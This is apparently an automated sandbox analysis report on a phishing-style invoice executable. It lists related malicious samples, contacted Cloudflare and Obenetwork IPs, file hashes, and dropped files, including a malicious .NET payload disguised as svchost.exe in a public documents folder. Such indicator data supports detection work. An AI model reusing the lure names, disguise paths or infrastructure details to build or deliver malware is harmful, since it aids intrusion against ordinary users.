                                                        DOC-654354.xlsxGet hashmaliciousBrowse
                                                        • 104.21.71.230
                                                        xQHJ4rJmTi.exeGet hashmaliciousBrowse
                                                        • 104.21.71.230
                                                        RFQ CSDOK202040890.exeGet hashmaliciousBrowse
                                                        • 104.21.71.230
                                                        SAL-0908889000.exeGet hashmaliciousBrowse
                                                        • 104.21.71.230
                                                        Purchase Order_Pdf.exeGet hashmaliciousBrowse
                                                        • 104.21.71.230
                                                        Payment Notification.docGet hashmaliciousBrowse
                                                        • 172.67.172.17
                                                        SecuriteInfo.com.Artemis30F445BB737F.24261.exeGet hashmaliciousBrowse
                                                        • 104.21.71.230
                                                        PO98000000090.jarGet hashmaliciousBrowse
                                                        • 172.67.172.17

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        CLOUDFLARENETUSPurchase Order.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        DHL Shipment Notification 49833912.pdf.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        UAE CONTRACT SUPPLY.exeGet hashmaliciousBrowse
                                                        • 104.21.32.11
                                                        RFQ - REF 208056-pdf.exeGet hashmaliciousBrowse
                                                        • 172.67.172.17
                                                        CN-Invoice-XXXXX9808-19011143287994.exeGet hashmaliciousBrowse
                                                        • 172.67.172.17
                                                        twistercrypted.exeGet hashmaliciousBrowse
                                                        • 104.18.28.12
                                                        C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                        • 104.16.19.94
                                                        C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                        • 104.16.18.94
                                                        C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                        • 104.17.234.204
                                                        Returned Message Body.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        W175EHpHv3.exeGet hashmaliciousBrowse
                                                        • 172.67.194.108
                                                        Bankdaten #f6356.pdf.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        W175EHpHv3.exeGet hashmaliciousBrowse
                                                        • 172.67.194.108
                                                        PO#2102003.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        Qvc Order .exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        company inquiry.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        Neue Bestellung_WJO-001, pdf.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        Order NX-LI-15-0001.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        TNT eInvoice_pdf.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        000INV00776.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        CLOUDFLARENETUSPurchase Order.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        DHL Shipment Notification 49833912.pdf.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        UAE CONTRACT SUPPLY.exeGet hashmaliciousBrowse
                                                        • 104.21.32.11
                                                        RFQ - REF 208056-pdf.exeGet hashmaliciousBrowse
                                                        • 172.67.172.17
                                                        CN-Invoice-XXXXX9808-19011143287994.exeGet hashmaliciousBrowse
                                                        • 172.67.172.17
                                                        twistercrypted.exeGet hashmaliciousBrowse
                                                        • 104.18.28.12
                                                        C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                        • 104.16.19.94
                                                        C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                        • 104.16.18.94
                                                        C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                        • 104.17.234.204
                                                        Returned Message Body.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        W175EHpHv3.exeGet hashmaliciousBrowse
                                                        • 172.67.194.108
                                                        Bankdaten #f6356.pdf.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        W175EHpHv3.exeGet hashmaliciousBrowse
                                                        • 172.67.194.108
                                                        PO#2102003.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        Qvc Order .exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        company inquiry.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        Neue Bestellung_WJO-001, pdf.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        Order NX-LI-15-0001.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        TNT eInvoice_pdf.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        000INV00776.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        OBE-EUROPEObenetworkEuropeSECN-Invoice-XXXXX9808-19011143287994.exeGet hashmaliciousBrowse
                                                        • 185.157.161.86
                                                        DHL_document1102202068090891.exeGet hashmaliciousBrowse
                                                        • 185.157.160.229
                                                        cm0Ubgm8Eu.exeGet hashmaliciousBrowse
                                                        • 185.86.106.202
                                                        hKL7ER44NR.exeGet hashmaliciousBrowse
                                                        • 185.86.106.202
                                                        Waybill.exeGet hashmaliciousBrowse
                                                        • 217.64.151.17
                                                        New purchase order PO 78903215,pdf.exeGet hashmaliciousBrowse
                                                        • 185.86.106.202
                                                        xRxGPqypIw.exeGet hashmaliciousBrowse
                                                        • 185.86.106.202
                                                        CN-Invoice-XXXXX9808-19011143287993.exeGet hashmaliciousBrowse
                                                        • 185.157.161.86
                                                        CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                                        • 185.157.160.233
                                                        REVISED ORDER 2322020.EXEGet hashmaliciousBrowse
                                                        • 185.86.106.202
                                                        muOvK6dngg.exeGet hashmaliciousBrowse
                                                        • 45.148.16.42
                                                        RE ICA 40 Sdn Bhd- Purchase Order#6769704.exeGet hashmaliciousBrowse
                                                        • 185.86.106.202
                                                        Offer Request 6100003768.exeGet hashmaliciousBrowse
                                                        • 185.86.106.202
                                                        CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                        • 185.157.161.86
                                                        JFAaEh5hB6.exeGet hashmaliciousBrowse
                                                        • 45.148.16.42
                                                        BMfiIGROO2.exeGet hashmaliciousBrowse
                                                        • 45.148.16.42
                                                        SLAX3807432211884DL772508146394DO.exeGet hashmaliciousBrowse
                                                        • 194.32.146.140
                                                        CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                        • 185.157.161.86
                                                        18.02.2021 PAYMENT INFO.exeGet hashmaliciousBrowse
                                                        • 185.157.160.233
                                                        DHL_Shipment_Notofication#554334.exeGet hashmaliciousBrowse
                                                        • 217.64.149.164

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeRFQ - REF 208056-pdf.exeGet hashmaliciousBrowse
                                                          CN-Invoice-XXXXX9808-19011143287994.exeGet hashmaliciousBrowse
                                                            PRODUCT SPECIFICATION.exeGet hashmaliciousBrowse
                                                              DHL_document1102202068090891.exeGet hashmaliciousBrowse
                                                                em6eElVbOm.exeGet hashmaliciousBrowse
                                                                  Purchase Order_Pdf.exeGet hashmaliciousBrowse
                                                                    Fireman.exeGet hashmaliciousBrowse
                                                                      NEW ORDER.exeGet hashmaliciousBrowse
                                                                        CN-Invoice-XXXXX9808-19011143287993.exeGet hashmaliciousBrowse
                                                                          payment confirmation 0029175112.exeGet hashmaliciousBrowse
                                                                            Vrxs6evJO7.exeGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exeGet hashmaliciousBrowse
                                                                                RMe2JcmlSh.exeGet hashmaliciousBrowse
                                                                                  New Order 2300030317388 InterMetro.exeGet hashmaliciousBrowse
                                                                                    CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                                                                      PURCHASE ITEMS.exeGet hashmaliciousBrowse
                                                                                        CN-Invoice-XXXXX9808-19011143287992.exeGet hashmaliciousBrowse
                                                                                          quotation_PR # 00459182..exeGet hashmaliciousBrowse
                                                                                            PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
                                                                                              New Order.exeGet hashmaliciousBrowse

                                                                                                Created / dropped Files

                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_3LWGGRA4ECLWYAEO_97668642ca38ba99515211a838d3dcfd90db8c_ed962414_1404f0da\Report.wer
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):16872
                                                                                                Entropy (8bit):3.781923819557371
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:tyVK3jRXicmHBUZMXyXpaKsUO+CZFz/u7s7S274ItxgJE:EK3jRXIBUZMXyXpaqqp/u7s7X4ItxgJE
                                                                                                MD5:D17DCFBCEB5C49E34A6CA8DFD370903D
                                                                                                SHA1:AFA884D002D5328147D599F6D6D755ACA117C513
                                                                                                SHA-256:E3421A38BCB15AAEEC58EEEC642A766C7643C28D5C7235E612B5722B835A81D0
                                                                                                SHA-512:7063CD85E7AEFB9E2BD4884A82AE494A6349E2D99AFC1AA03F596EF3F3A17682679A18318B7DFDDAABD6DB379C805FC442094F818324BFBE74FA14A29AD98928
                                                                                                Malicious:false
                                                                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.7.6.9.2.9.3.9.6.4.8.3.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.7.6.9.3.2.6.5.5.8.4.9.6.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.4.6.4.f.5.e.-.6.c.f.0.-.4.9.0.6.-.9.4.c.9.-.1.5.2.d.1.9.d.e.a.f.2.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.2.b.6.c.2.a.-.0.9.0.5.-.4.4.c.0.-.8.f.4.1.-.f.d.3.f.8.b.0.6.0.c.9.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.N.-.I.n.v.o.i.c.e.-.X.X.X.X.X.9.8.0.8.-.1.9.0.1.1.1.4.3.2.8.7.9.8.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.a.4.-.0.0.0.1.-.0.0.1.7.-.4.7.0.2.-.9.c.8.e.c.d.0.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.e.e.1.3.b.a.1.2.6.2.a.a.4.0.c.9.1.3.e.6.c.a.9.b.1.0.2.3.0.7.9.0.0.0.0.0.9.0.4.!.0.0.0.0.f.1.d.e.5.5.b.6.d.e.f.8.a.a.d.d.6.c.f.e.7.a.f.c.c.b.2.3.0.c.f.2.8.8.a.d.2.3.d.
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4400.tmp.dmp
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:Mini DuMP crash report, 15 streams, Thu Feb 25 23:28:26 2021, 0x1205a4 type
                                                                                                Category:dropped
                                                                                                Size (bytes):349941
                                                                                                Entropy (8bit):4.096464783179336
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:GRl0r0jd+pJ90mwUCgUQYMel9gIOgF5fLadO0oNt9sAdRooJtGC4t7V0KT6f:Gj0JpJ9QTjr7l9RpDeO0StoXY8Y
                                                                                                MD5:86421086A7452C239FD078E5B072FFD0
                                                                                                SHA1:02F052D9092D52B9182278552FFA45488B24E492
                                                                                                SHA-256:19F0739C3C01B86CFE46CB6AE6321C994F9AF6DA2D55674327B72804D70C9A61
                                                                                                SHA-512:FFD81C18C054520C040E2B334A7013A18A5177A7BB5E065976E0732064AA2892723915E3D6260D0410725ACE282ECC11C6DA4DBA577BE4D606F3AE19DBFA670B
                                                                                                Malicious:false
                                                                                                Preview: MDMP....... ........28`...................U...........B......4-......GenuineIntelW...........T............18`>...#........................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER837B.tmp.WERInternalMetadata.xml
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8496
                                                                                                Entropy (8bit):3.709970844058628
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:Rrl7r3GLNinbKPA6/DV6YSwSUihsBgmfZaSKCpr489bWCsfmjym:RrlsNibl6p6YVSUihigmfwSXWBfm
                                                                                                MD5:3DBFCECAA223883A1C7E67DE755575D8
                                                                                                SHA1:D38EC7550EE7D90295D60DF9C0C4F64980A3F6CD
                                                                                                SHA-256:F32BC21BF531960ABDFF6B96A86A647D9349E69971A774F343AE4960BC988466
                                                                                                SHA-512:EFE3CF648FB1075B8B527E1E15AD5C9E6A9428F2E982FFE8D237E8C5C32C2BF5B1CF4C7FC3F509CA8EB85EC8F52E99B330DCB3F24177A9092EDB97CF65EF1700
                                                                                                Malicious:false
                                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.3.6.<./.P.i.d.>.......
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER8ADE.tmp.xml
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):4800
                                                                                                Entropy (8bit):4.561610944136997
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:cvIwSD8zsIJgtWI9S0WSC8B08fm8M4JiFFl+q8vX7O4qHuQUad:uITfO1tSNzJsKLO4qHuZad
                                                                                                MD5:E2C84129DC3E79D897C2EEA0CB742849
                                                                                                SHA1:5C1925510AD12252A20CC5FEF1C205C796421B69
                                                                                                SHA-256:FAA38CFAED629CD4832BB3F897EEAC0D958E00F63E272D35EE8DFA997D3DE760
                                                                                                SHA-512:A4FC610DB7E7FBDED05AF3DC8EC00C9102FFD0D57C0910C426B18D0B19F3971D5C0F83F49575B0FDB057E0343EA3D3AF8D1F413A8AF389CB8CD93A3BD09F3CF8
                                                                                                Malicious:false
                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="877479" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER8AEC.tmp.csv
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):54948
                                                                                                Entropy (8bit):3.0754279636881954
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:UKH+v3o9+PtzZk5yWG3EIYpXa6QbXoff+Fiive55Z:UKH+v3o9+PtzZk5yWG3EIYpK6QbXoffj
                                                                                                MD5:781E98C3BFD59AFB7D363BB7A2EE4206
                                                                                                SHA1:BF1C4A6A6D9F078366972BB73A29FD139C38EAA4
                                                                                                SHA-256:298C4DA5D27A0E4789C13171A7AAA8CDE10D5E2D78A492F61CE9AFD1A7ABC201
                                                                                                SHA-512:75218DB11B31E13BC917C82AD90FC40DBD986179B41B60F7E7F199A5AFC562EF5BE340F8D0FBDF059FD9366AE16BE0A64798B9E3DCA212A6B3B774AB844CAAFB
                                                                                                Malicious:false
                                                                                                Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FCF.tmp.txt
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):13340
                                                                                                Entropy (8bit):2.698807024577951
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:9GiZYW3hhRxAYOYmLW5s3HLUYEZ9ft8CidijKZ2waS2aFQpvDTztIu13:9jZDQ5MZ1aFQRDTGu13
                                                                                                MD5:F97A2D2FB16CE21420FE3ADC438000CB
                                                                                                SHA1:F1F1CAE4823B1CA2EDF557E37CEAF75D84EE3A90
                                                                                                SHA-256:14FCD8B866BC4FF2AB29C2E44D23F18192421C13AD93FB815EA381475DF082CA
                                                                                                SHA-512:3A8611A17FFD642D67A8251474F383779E6A8E533746E75812444BCC8716D281CC806BD0C2783A9DB9F4E8FFC35D86BFBD7184CB4FA2453CFC586DD544D20CCA
                                                                                                Malicious:false
                                                                                                Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                C:\Users\Public\Documents\RiXHGNhjF\svchost.exe
                                                                                                Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):341280
                                                                                                Entropy (8bit):4.221155622319102
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:JhoSaX02Mu1UEX/H1UJn4H6LOU/+Pq58s2lP3iFwDt:12Mu1UEX/H1UJn4aKUcq58syP3iF
                                                                                                MD5:6ECB42A8B14658CD4EE39D5E09B103F5
                                                                                                SHA1:F1DE55B6DEF8AADD6CFE7AFCCB230CF288AD23DD
                                                                                                SHA-256:6239F3411C5ABB060B14D248C7408EACC2C02C0653ED10AC533177675220AED7
                                                                                                SHA-512:E0BB9ECF859EBA0B4130A9BED83A3CF7634108200483236EB5557BBF6A3C3A8544A1D6AD670450009F92B514ACB3B2622DE9AAFAA3F4CFCECF5D3EBA0630EF6D
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 38%
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....bE..........."...0..............6... ...@....@.. ....................................@..................................6..O....@............... .. ....`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................6......H.......D...h............................................................*..(....*..(....*~s ........s!........s.........*Bs....o....o"...*..0..........r...pr...p~....o....r...pr...p~....o....~....o....r...pr:..p~....o....rH..prl..p~....o....~....o....~....o....rz..pr'..p~....o....r5..prY..p~....o....~....o....rg..pr...p~....o....r...pr...p~....o....~....o....~....o....~....o....r...pr...p~....o....r...pr...p~....o....~....o....r...prV..p~....o....rd..pr...p~....o....~....o..
                                                                                                C:\Users\Public\Documents\RiXHGNhjF\svchost.exe:Zone.Identifier
                                                                                                Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:true
                                                                                                Preview: [ZoneTransfer]....ZoneId=0
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):14734
                                                                                                Entropy (8bit):4.993014478972177
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:v/gUiQ0HzAFiAkib4cnopbjvwRjdvRfOdBHCwKNXp5h:v/gUinHzwLDnopbjoRjdvRfOdBHCwKNd
                                                                                                MD5:16AC297E930C7C65E347BE84A6EA13D4
                                                                                                SHA1:DAECC90190E81A33A240BF61C035EE54F8623DBF
                                                                                                SHA-256:E75CED29CC1E68B5EB4561D892E77527F5516B45BAAA3DD8D0107A8C8087E10D
                                                                                                SHA-512:914A5CD91C1FC0D3BE9D29EB692EEA96EF4F2F75F1514E9C2D260C233B5DFFF0D47F62DC52D0A04D9E55F1F13BD19658A7AF1BC4D6373800DC9B30C0E2E690BB
                                                                                                Malicious:false
                                                                                                Preview: PSMODULECACHE......~o(...A...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Appx\Appx.psd1........Get-AppxPackageManifest........Add-AppxPackage........Get-AppxLastError........Remove-AppxPackage........Remove-AppxVolume........Get-AppxDefaultVolume........Add-AppxVolume........Get-AppxVolume........Get-AppxLog........Invoke-CommandInDesktopPackage........Mount-AppxVolume........Set-AppxDefaultVolume........Get-AppxPackage........Move-AppxPackage........Dismount-AppxVolume........yH.8...I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider....
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):22156
                                                                                                Entropy (8bit):5.60047813204778
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:gjtCDlvuCox9NTSBKnCultIeTF7I9jMqU3Y1Mh1m1+RRV79Q3DK5LYI++Rq:g79NT4KCultnTLqgUsJ0x
                                                                                                MD5:B625F069EB150B0B7C4A5B51781FEBD6
                                                                                                SHA1:5A1F5CEB9B9C5CBC4361AACCB12C142D7C100DF4
                                                                                                SHA-256:EB7276B5C75ABBACC74C93FA58A7811466FCA6270D419B7A09C9EF3DD4536CFC
                                                                                                SHA-512:48304E37B0330D8D61C8D063B3E855CDE831D992E6A27C161B23468908106E4A9E8202F283EA8351FB246F91B60E1649A91B2F91CE07E9C4AF937472D8ACA5EC
                                                                                                Malicious:false
                                                                                                Preview: @...e...........Z...........X.L.'.....s.9............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gw5bzze5.oee.ps1
